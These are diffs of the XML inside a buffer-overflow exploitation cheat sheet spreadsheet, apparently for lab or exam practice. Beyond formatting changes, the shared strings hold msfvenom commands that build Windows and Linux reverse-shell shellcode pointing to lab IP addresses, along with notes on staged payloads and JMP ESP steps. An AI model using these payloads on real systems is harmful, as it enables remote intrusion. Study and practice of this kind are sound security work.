--- a/BOF_Cheatsheet.xlsx
+++ b/BOF_Cheatsheet.xlsx
@@ -26,7 +26,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="114" uniqueCount="111">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="116" uniqueCount="114">
   <si>
     <t xml:space="preserve">Stack Based buffer Overflow </t>
   </si>
@@ -361,6 +361,15 @@
   </si>
   <si>
     <t>print testBed + "\n\n"</t>
+  </si>
+  <si>
+    <t>X86, X64 -&gt; Stagged Paylaod</t>
+  </si>
+  <si>
+    <t>msfvenom -p windows/shell_reverse_tcp LHOST=192.168.150.128 LPORT=8443 -b "\x00" -f py -v shellcode AppendExit=true</t>
+  </si>
+  <si>
+    <t>X86, X64 -&gt; Non-Stagged Paylaod, caught via NC</t>
   </si>
 </sst>
 </file>
@@ -695,7 +704,7 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="38">
+  <cellXfs count="41">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
@@ -775,6 +784,15 @@
     </xf>
     <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="3" fillId="0" borderId="15" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="3" fillId="0" borderId="17" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
     </xf>
   </cellXfs>
   <cellStyles count="1">
@@ -1056,10 +1074,10 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
-  <dimension ref="A1:H92"/>
+  <dimension ref="A1:H93"/>
   <sheetViews>
-    <sheetView showGridLines="0" tabSelected="1" topLeftCell="A28" zoomScale="90" zoomScaleNormal="90" workbookViewId="0">
-      <selection activeCell="C38" sqref="C38"/>
+    <sheetView showGridLines="0" tabSelected="1" topLeftCell="B22" zoomScale="90" zoomScaleNormal="90" workbookViewId="0">
+      <selection activeCell="C33" sqref="C33"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
@@ -1446,62 +1464,64 @@
       <c r="G31" s="6"/>
       <c r="H31" s="6"/>
     </row>
-    <row r="32" spans="1:8" s="4" customFormat="1" ht="31" x14ac:dyDescent="0.35">
+    <row r="32" spans="1:8" s="4" customFormat="1" ht="31.5" thickBot="1" x14ac:dyDescent="0.4">
       <c r="A32" s="26"/>
       <c r="B32" s="11" t="s">
         <v>46</v>
       </c>
-      <c r="C32" s="27" t="s">
+      <c r="C32" s="38" t="s">
         <v>31</v>
       </c>
       <c r="D32" s="27" t="s">
-        <v>49</v>
+        <v>111</v>
       </c>
       <c r="E32" s="26"/>
       <c r="F32" s="26"/>
       <c r="G32" s="26"/>
       <c r="H32" s="26"/>
     </row>
-    <row r="33" spans="1:8" s="4" customFormat="1" ht="31.5" thickBot="1" x14ac:dyDescent="0.4">
+    <row r="33" spans="1:8" s="4" customFormat="1" ht="31" x14ac:dyDescent="0.35">
       <c r="A33" s="26"/>
-      <c r="B33" s="24" t="s">
-        <v>47</v>
-      </c>
-      <c r="C33" s="28" t="s">
-        <v>48</v>
-      </c>
-      <c r="D33" s="28" t="s">
-        <v>49</v>
+      <c r="B33" s="21"/>
+      <c r="C33" s="39" t="s">
+        <v>112</v>
+      </c>
+      <c r="D33" s="38" t="s">
+        <v>113</v>
       </c>
       <c r="E33" s="26"/>
       <c r="F33" s="26"/>
       <c r="G33" s="26"/>
       <c r="H33" s="26"/>
     </row>
-    <row r="34" spans="1:8" s="4" customFormat="1" ht="15.5" x14ac:dyDescent="0.35">
+    <row r="34" spans="1:8" s="4" customFormat="1" ht="31.5" thickBot="1" x14ac:dyDescent="0.4">
       <c r="A34" s="26"/>
-      <c r="B34" s="7"/>
-      <c r="C34" s="29"/>
-      <c r="D34" s="29"/>
+      <c r="B34" s="24" t="s">
+        <v>47</v>
+      </c>
+      <c r="C34" s="40" t="s">
+        <v>48</v>
+      </c>
+      <c r="D34" s="28" t="s">
+        <v>49</v>
+      </c>
       <c r="E34" s="26"/>
       <c r="F34" s="26"/>
       <c r="G34" s="26"/>
       <c r="H34" s="26"/>
     </row>
-    <row r="35" spans="1:8" ht="16" thickBot="1" x14ac:dyDescent="0.4">
-      <c r="A35" s="6"/>
+    <row r="35" spans="1:8" s="4" customFormat="1" ht="15.5" x14ac:dyDescent="0.35">
+      <c r="A35" s="26"/>
       <c r="B35" s="7"/>
-      <c r="C35" s="6"/>
-      <c r="D35" s="6"/>
-      <c r="E35" s="6"/>
-      <c r="F35" s="6"/>
-      <c r="G35" s="6"/>
-      <c r="H35" s="6"/>
+      <c r="C35" s="29"/>
+      <c r="D35" s="29"/>
+      <c r="E35" s="26"/>
+      <c r="F35" s="26"/>
+      <c r="G35" s="26"/>
+      <c r="H35" s="26"/>
     </row>
     <row r="36" spans="1:8" ht="16" thickBot="1" x14ac:dyDescent="0.4">
-      <c r="A36" s="5" t="s">
-        <v>23</v>
-      </c>
+      <c r="A36" s="6"/>
       <c r="B36" s="7"/>
       <c r="C36" s="6"/>
       <c r="D36" s="6"/>
@@ -1510,17 +1530,13 @@
       <c r="G36" s="6"/>
       <c r="H36" s="6"/>
     </row>
-    <row r="37" spans="1:8" ht="15.5" x14ac:dyDescent="0.35">
-      <c r="A37" s="6"/>
-      <c r="B37" s="11" t="s">
-        <v>24</v>
-      </c>
-      <c r="C37" s="30" t="s">
-        <v>25</v>
-      </c>
-      <c r="D37" s="13" t="s">
-        <v>27</v>
-      </c>
+    <row r="37" spans="1:8" ht="16" thickBot="1" x14ac:dyDescent="0.4">
+      <c r="A37" s="5" t="s">
+        <v>23</v>
+      </c>
+      <c r="B37" s="7"/>
+      <c r="C37" s="6"/>
+      <c r="D37" s="6"/>
       <c r="E37" s="6"/>
       <c r="F37" s="6"/>
       <c r="G37" s="6"/>
@@ -1528,43 +1544,49 @@
     </row>
     <row r="38" spans="1:8" ht="15.5" x14ac:dyDescent="0.35">
       <c r="A38" s="6"/>
-      <c r="B38" s="21"/>
-      <c r="C38" s="22" t="s">
-        <v>26</v>
-      </c>
-      <c r="D38" s="16"/>
+      <c r="B38" s="11" t="s">
+        <v>24</v>
+      </c>
+      <c r="C38" s="30" t="s">
+        <v>25</v>
+      </c>
+      <c r="D38" s="13" t="s">
+        <v>27</v>
+      </c>
       <c r="E38" s="6"/>
       <c r="F38" s="6"/>
       <c r="G38" s="6"/>
       <c r="H38" s="6"/>
     </row>
-    <row r="39" spans="1:8" ht="16" thickBot="1" x14ac:dyDescent="0.4">
+    <row r="39" spans="1:8" ht="15.5" x14ac:dyDescent="0.35">
       <c r="A39" s="6"/>
-      <c r="B39" s="24" t="s">
-        <v>28</v>
-      </c>
-      <c r="C39" s="25" t="s">
-        <v>29</v>
-      </c>
-      <c r="D39" s="19" t="s">
-        <v>30</v>
-      </c>
+      <c r="B39" s="21"/>
+      <c r="C39" s="22" t="s">
+        <v>26</v>
+      </c>
+      <c r="D39" s="16"/>
       <c r="E39" s="6"/>
       <c r="F39" s="6"/>
       <c r="G39" s="6"/>
       <c r="H39" s="6"/>
     </row>
-    <row r="40" spans="1:8" ht="15.5" x14ac:dyDescent="0.35">
+    <row r="40" spans="1:8" ht="16" thickBot="1" x14ac:dyDescent="0.4">
       <c r="A40" s="6"/>
-      <c r="B40" s="7"/>
-      <c r="C40" s="6"/>
-      <c r="D40" s="6"/>
+      <c r="B40" s="24" t="s">
+        <v>28</v>
+      </c>
+      <c r="C40" s="25" t="s">
+        <v>29</v>
+      </c>
+      <c r="D40" s="19" t="s">
+        <v>30</v>
+      </c>
       <c r="E40" s="6"/>
       <c r="F40" s="6"/>
       <c r="G40" s="6"/>
       <c r="H40" s="6"/>
     </row>
-    <row r="41" spans="1:8" ht="16" thickBot="1" x14ac:dyDescent="0.4">
+    <row r="41" spans="1:8" ht="15.5" x14ac:dyDescent="0.35">
       <c r="A41" s="6"/>
       <c r="B41" s="7"/>
       <c r="C41" s="6"/>
@@ -1575,12 +1597,8 @@
       <c r="H41" s="6"/>
     </row>
     <row r="42" spans="1:8" ht="16" thickBot="1" x14ac:dyDescent="0.4">
-      <c r="A42" s="5" t="s">
-        <v>32</v>
-      </c>
-      <c r="B42" s="37" t="s">
-        <v>33</v>
-      </c>
+      <c r="A42" s="6"/>
+      <c r="B42" s="7"/>
       <c r="C42" s="6"/>
       <c r="D42" s="6"/>
       <c r="E42" s="6"/>
@@ -1588,31 +1606,29 @@
       <c r="G42" s="6"/>
       <c r="H42" s="6"/>
     </row>
-    <row r="43" spans="1:8" ht="15.5" x14ac:dyDescent="0.35">
-      <c r="A43" s="6"/>
-      <c r="B43" s="11" t="s">
-        <v>50</v>
-      </c>
-      <c r="C43" s="30" t="s">
-        <v>34</v>
-      </c>
-      <c r="D43" s="13" t="s">
-        <v>36</v>
-      </c>
+    <row r="43" spans="1:8" ht="16" thickBot="1" x14ac:dyDescent="0.4">
+      <c r="A43" s="5" t="s">
+        <v>32</v>
+      </c>
+      <c r="B43" s="37" t="s">
+        <v>33</v>
+      </c>
+      <c r="C43" s="6"/>
+      <c r="D43" s="6"/>
       <c r="E43" s="6"/>
       <c r="F43" s="6"/>
       <c r="G43" s="6"/>
       <c r="H43" s="6"/>
     </row>
-    <row r="44" spans="1:8" ht="16" thickBot="1" x14ac:dyDescent="0.4">
+    <row r="44" spans="1:8" ht="15.5" x14ac:dyDescent="0.35">
       <c r="A44" s="6"/>
-      <c r="B44" s="24" t="s">
-        <v>51</v>
-      </c>
-      <c r="C44" s="25" t="s">
-        <v>35</v>
-      </c>
-      <c r="D44" s="19" t="s">
+      <c r="B44" s="11" t="s">
+        <v>50</v>
+      </c>
+      <c r="C44" s="30" t="s">
+        <v>34</v>
+      </c>
+      <c r="D44" s="13" t="s">
         <v>36</v>
       </c>
       <c r="E44" s="6"/>
@@ -1620,11 +1636,17 @@
       <c r="G44" s="6"/>
       <c r="H44" s="6"/>
     </row>
-    <row r="45" spans="1:8" ht="15.5" x14ac:dyDescent="0.35">
+    <row r="45" spans="1:8" ht="16" thickBot="1" x14ac:dyDescent="0.4">
       <c r="A45" s="6"/>
-      <c r="B45" s="7"/>
-      <c r="C45" s="6"/>
-      <c r="D45" s="6"/>
+      <c r="B45" s="24" t="s">
+        <v>51</v>
+      </c>
+      <c r="C45" s="25" t="s">
+        <v>35</v>
+      </c>
+      <c r="D45" s="19" t="s">
+        <v>36</v>
+      </c>
       <c r="E45" s="6"/>
       <c r="F45" s="6"/>
       <c r="G45" s="6"/>
@@ -2099,6 +2121,16 @@
       <c r="F92" s="6"/>
       <c r="G92" s="6"/>
       <c r="H92" s="6"/>
+    </row>
+    <row r="93" spans="1:8" ht="15.5" x14ac:dyDescent="0.35">
+      <c r="A93" s="6"/>
+      <c r="B93" s="7"/>
+      <c r="C93" s="6"/>
+      <c r="D93" s="6"/>
+      <c r="E93" s="6"/>
+      <c r="F93" s="6"/>
+      <c r="G93" s="6"/>
+      <c r="H93" s="6"/>
     </row>
   </sheetData>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>

--- a/BOF_Cheatsheet.xlsx
+++ b/BOF_Cheatsheet.xlsx
@@ -1,15 +1,16 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
-<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" mc:Ignorable="x15">
-  <fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/>
-  <workbookPr defaultThemeVersion="153222"/>
+<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="23001"/>
+  <workbookPr/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\Ashwin\Desktop\"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\ashwi\Documents\Cheatsheets\"/>
     </mc:Choice>
   </mc:AlternateContent>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{2427C919-F099-4605-86A9-AEF769B1F1C2}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="0" windowWidth="19200" windowHeight="7450"/>
+    <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11310" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
   <sheets>
     <sheet name="Checklist" sheetId="1" r:id="rId1"/>
@@ -26,7 +27,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="116" uniqueCount="114">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="114" uniqueCount="111">
   <si>
     <t xml:space="preserve">Stack Based buffer Overflow </t>
   </si>
@@ -119,9 +120,6 @@
   </si>
   <si>
     <t>Crash the program and JMP ESP on all loaded modules</t>
-  </si>
-  <si>
-    <t>msfvenom -p windows/shell/reverse_tcp LHOST=192.168.150.128 LPORT=8443 -b "\x00" -f py -v shellcode AppendExit=true</t>
   </si>
   <si>
     <t>Multi Staged Shellcode</t>
@@ -174,12 +172,6 @@
     <t>Linux</t>
   </si>
   <si>
-    <t>msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 -b "\x0 0\x20" -f py -v shellcode</t>
-  </si>
-  <si>
-    <t>X86, X64</t>
-  </si>
-  <si>
     <t>EAX+24</t>
   </si>
   <si>
@@ -363,19 +355,19 @@
     <t>print testBed + "\n\n"</t>
   </si>
   <si>
-    <t>X86, X64 -&gt; Stagged Paylaod</t>
-  </si>
-  <si>
-    <t>msfvenom -p windows/shell_reverse_tcp LHOST=192.168.150.128 LPORT=8443 -b "\x00" -f py -v shellcode AppendExit=true</t>
-  </si>
-  <si>
-    <t>X86, X64 -&gt; Non-Stagged Paylaod, caught via NC</t>
+    <t>msfvenom -p windows/shell/reverse_tcp LHOST=192.168.150.128 LPORT=8443 -b "\x00" -f py -v shellcode -n 48 AppendExit=true</t>
+  </si>
+  <si>
+    <t>msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 -b "\x0 0\x20" -f py -v shellcode -n 48</t>
+  </si>
+  <si>
+    <t>X86, X64 Included with nops</t>
   </si>
 </sst>
 </file>
 
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
+<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="x14ac x16r2 xr">
   <fonts count="7" x14ac:knownFonts="1">
     <font>
       <sz val="11"/>
@@ -704,7 +696,7 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="41">
+  <cellXfs count="38">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
@@ -784,15 +776,6 @@
     </xf>
     <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="3" fillId="0" borderId="15" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
-      <alignment vertical="center" wrapText="1"/>
-    </xf>
-    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
-      <alignment vertical="center" wrapText="1"/>
-    </xf>
-    <xf numFmtId="0" fontId="3" fillId="0" borderId="17" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
-      <alignment vertical="center" wrapText="1"/>
     </xf>
   </cellXfs>
   <cellStyles count="1">
@@ -1073,36 +1056,36 @@
 </file>
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
-<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
-  <dimension ref="A1:H93"/>
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0000-000000000000}">
+  <dimension ref="A1:H92"/>
   <sheetViews>
-    <sheetView showGridLines="0" tabSelected="1" topLeftCell="B22" zoomScale="90" zoomScaleNormal="90" workbookViewId="0">
-      <selection activeCell="C33" sqref="C33"/>
+    <sheetView showGridLines="0" tabSelected="1" topLeftCell="A25" zoomScale="90" zoomScaleNormal="90" workbookViewId="0">
+      <selection activeCell="D33" sqref="D33"/>
     </sheetView>
   </sheetViews>
-  <sheetFormatPr defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
+  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
   <cols>
-    <col min="1" max="1" width="28.08984375" bestFit="1" customWidth="1"/>
+    <col min="1" max="1" width="28.140625" bestFit="1" customWidth="1"/>
     <col min="2" max="2" width="20" style="1" bestFit="1" customWidth="1"/>
-    <col min="3" max="3" width="93.81640625" customWidth="1"/>
-    <col min="4" max="4" width="46.54296875" customWidth="1"/>
-    <col min="5" max="5" width="11.08984375" bestFit="1" customWidth="1"/>
+    <col min="3" max="3" width="93.85546875" customWidth="1"/>
+    <col min="4" max="4" width="46.5703125" customWidth="1"/>
+    <col min="5" max="5" width="11.140625" bestFit="1" customWidth="1"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:8" s="2" customFormat="1" x14ac:dyDescent="0.35">
+    <row r="1" spans="1:8" s="2" customFormat="1" x14ac:dyDescent="0.25">
       <c r="B1" s="1"/>
     </row>
-    <row r="2" spans="1:8" ht="15.5" x14ac:dyDescent="0.35">
+    <row r="2" spans="1:8" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A2" s="34" t="s">
         <v>0</v>
       </c>
       <c r="B2" s="33"/>
       <c r="C2" s="32" t="s">
-        <v>52</v>
+        <v>49</v>
       </c>
       <c r="D2" s="33"/>
     </row>
-    <row r="4" spans="1:8" ht="15.5" x14ac:dyDescent="0.35">
+    <row r="4" spans="1:8" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A4" s="3" t="s">
         <v>2</v>
       </c>
@@ -1116,7 +1099,7 @@
         <v>3</v>
       </c>
     </row>
-    <row r="5" spans="1:8" ht="16" thickBot="1" x14ac:dyDescent="0.4">
+    <row r="5" spans="1:8" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
       <c r="A5" s="6"/>
       <c r="B5" s="7"/>
       <c r="C5" s="6"/>
@@ -1126,9 +1109,9 @@
       <c r="G5" s="6"/>
       <c r="H5" s="6"/>
     </row>
-    <row r="6" spans="1:8" s="2" customFormat="1" ht="16" thickBot="1" x14ac:dyDescent="0.4">
+    <row r="6" spans="1:8" s="2" customFormat="1" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
       <c r="A6" s="5" t="s">
-        <v>53</v>
+        <v>50</v>
       </c>
       <c r="B6" s="7"/>
       <c r="C6" s="6"/>
@@ -1138,37 +1121,37 @@
       <c r="G6" s="6"/>
       <c r="H6" s="6"/>
     </row>
-    <row r="7" spans="1:8" s="2" customFormat="1" ht="15.5" x14ac:dyDescent="0.35">
+    <row r="7" spans="1:8" s="2" customFormat="1" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A7" s="6"/>
       <c r="B7" s="11" t="s">
+        <v>51</v>
+      </c>
+      <c r="C7" s="30" t="s">
+        <v>53</v>
+      </c>
+      <c r="D7" s="31" t="s">
         <v>54</v>
-      </c>
-      <c r="C7" s="30" t="s">
-        <v>56</v>
-      </c>
-      <c r="D7" s="31" t="s">
-        <v>57</v>
       </c>
       <c r="E7" s="6"/>
       <c r="F7" s="6"/>
       <c r="G7" s="6"/>
       <c r="H7" s="6"/>
     </row>
-    <row r="8" spans="1:8" s="2" customFormat="1" ht="16" thickBot="1" x14ac:dyDescent="0.4">
+    <row r="8" spans="1:8" s="2" customFormat="1" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
       <c r="A8" s="6"/>
       <c r="B8" s="24"/>
       <c r="C8" s="25" t="s">
+        <v>52</v>
+      </c>
+      <c r="D8" s="19" t="s">
         <v>55</v>
-      </c>
-      <c r="D8" s="19" t="s">
-        <v>58</v>
       </c>
       <c r="E8" s="6"/>
       <c r="F8" s="6"/>
       <c r="G8" s="6"/>
       <c r="H8" s="6"/>
     </row>
-    <row r="9" spans="1:8" s="2" customFormat="1" ht="16" thickBot="1" x14ac:dyDescent="0.4">
+    <row r="9" spans="1:8" s="2" customFormat="1" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
       <c r="A9" s="6"/>
       <c r="B9" s="7"/>
       <c r="E9" s="6"/>
@@ -1176,7 +1159,7 @@
       <c r="G9" s="6"/>
       <c r="H9" s="6"/>
     </row>
-    <row r="10" spans="1:8" ht="16" thickBot="1" x14ac:dyDescent="0.4">
+    <row r="10" spans="1:8" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
       <c r="A10" s="5" t="s">
         <v>4</v>
       </c>
@@ -1188,7 +1171,7 @@
       <c r="G10" s="6"/>
       <c r="H10" s="6"/>
     </row>
-    <row r="11" spans="1:8" s="2" customFormat="1" ht="16" thickBot="1" x14ac:dyDescent="0.4">
+    <row r="11" spans="1:8" s="2" customFormat="1" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
       <c r="A11" s="7"/>
       <c r="B11" s="8" t="s">
         <v>12</v>
@@ -1204,7 +1187,7 @@
       <c r="G11" s="6"/>
       <c r="H11" s="6"/>
     </row>
-    <row r="12" spans="1:8" s="2" customFormat="1" ht="16" thickBot="1" x14ac:dyDescent="0.4">
+    <row r="12" spans="1:8" s="2" customFormat="1" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
       <c r="A12" s="6"/>
       <c r="B12" s="7"/>
       <c r="C12" s="6"/>
@@ -1214,7 +1197,7 @@
       <c r="G12" s="6"/>
       <c r="H12" s="6"/>
     </row>
-    <row r="13" spans="1:8" ht="16" thickBot="1" x14ac:dyDescent="0.4">
+    <row r="13" spans="1:8" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
       <c r="A13" s="5" t="s">
         <v>8</v>
       </c>
@@ -1226,7 +1209,7 @@
       <c r="G13" s="6"/>
       <c r="H13" s="6"/>
     </row>
-    <row r="14" spans="1:8" s="2" customFormat="1" ht="16" thickBot="1" x14ac:dyDescent="0.4">
+    <row r="14" spans="1:8" s="2" customFormat="1" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
       <c r="A14" s="7"/>
       <c r="B14" s="8" t="s">
         <v>11</v>
@@ -1242,7 +1225,7 @@
       <c r="G14" s="6"/>
       <c r="H14" s="6"/>
     </row>
-    <row r="15" spans="1:8" ht="16" thickBot="1" x14ac:dyDescent="0.4">
+    <row r="15" spans="1:8" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
       <c r="A15" s="6"/>
       <c r="B15" s="7"/>
       <c r="C15" s="6"/>
@@ -1252,12 +1235,12 @@
       <c r="G15" s="6"/>
       <c r="H15" s="6"/>
     </row>
-    <row r="16" spans="1:8" s="2" customFormat="1" ht="16" thickBot="1" x14ac:dyDescent="0.4">
+    <row r="16" spans="1:8" s="2" customFormat="1" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
       <c r="A16" s="5" t="s">
+        <v>36</v>
+      </c>
+      <c r="B16" s="35" t="s">
         <v>37</v>
-      </c>
-      <c r="B16" s="35" t="s">
-        <v>38</v>
       </c>
       <c r="C16" s="6"/>
       <c r="D16" s="6"/>
@@ -1266,13 +1249,13 @@
       <c r="G16" s="6"/>
       <c r="H16" s="6"/>
     </row>
-    <row r="17" spans="1:8" s="2" customFormat="1" ht="15.5" x14ac:dyDescent="0.35">
+    <row r="17" spans="1:8" s="2" customFormat="1" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A17" s="6"/>
       <c r="B17" s="11" t="s">
+        <v>38</v>
+      </c>
+      <c r="C17" s="12" t="s">
         <v>39</v>
-      </c>
-      <c r="C17" s="12" t="s">
-        <v>40</v>
       </c>
       <c r="D17" s="13"/>
       <c r="E17" s="6"/>
@@ -1280,13 +1263,13 @@
       <c r="G17" s="6"/>
       <c r="H17" s="6"/>
     </row>
-    <row r="18" spans="1:8" s="2" customFormat="1" ht="15.5" x14ac:dyDescent="0.35">
+    <row r="18" spans="1:8" s="2" customFormat="1" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A18" s="7"/>
       <c r="B18" s="14" t="s">
+        <v>40</v>
+      </c>
+      <c r="C18" s="15" t="s">
         <v>41</v>
-      </c>
-      <c r="C18" s="15" t="s">
-        <v>42</v>
       </c>
       <c r="D18" s="16"/>
       <c r="E18" s="6"/>
@@ -1294,13 +1277,13 @@
       <c r="G18" s="6"/>
       <c r="H18" s="6"/>
     </row>
-    <row r="19" spans="1:8" s="2" customFormat="1" ht="47" thickBot="1" x14ac:dyDescent="0.4">
+    <row r="19" spans="1:8" s="2" customFormat="1" ht="48" thickBot="1" x14ac:dyDescent="0.3">
       <c r="A19" s="7"/>
       <c r="B19" s="17" t="s">
-        <v>45</v>
+        <v>44</v>
       </c>
       <c r="C19" s="18" t="s">
-        <v>43</v>
+        <v>42</v>
       </c>
       <c r="D19" s="19"/>
       <c r="E19" s="6"/>
@@ -1308,7 +1291,7 @@
       <c r="G19" s="6"/>
       <c r="H19" s="6"/>
     </row>
-    <row r="20" spans="1:8" s="2" customFormat="1" ht="15.5" x14ac:dyDescent="0.35">
+    <row r="20" spans="1:8" s="2" customFormat="1" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A20" s="7"/>
       <c r="B20" s="6"/>
       <c r="C20" s="6"/>
@@ -1318,7 +1301,7 @@
       <c r="G20" s="6"/>
       <c r="H20" s="6"/>
     </row>
-    <row r="21" spans="1:8" ht="16" thickBot="1" x14ac:dyDescent="0.4">
+    <row r="21" spans="1:8" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
       <c r="A21" s="6"/>
       <c r="B21" s="7"/>
       <c r="C21" s="6"/>
@@ -1328,12 +1311,12 @@
       <c r="G21" s="6"/>
       <c r="H21" s="6"/>
     </row>
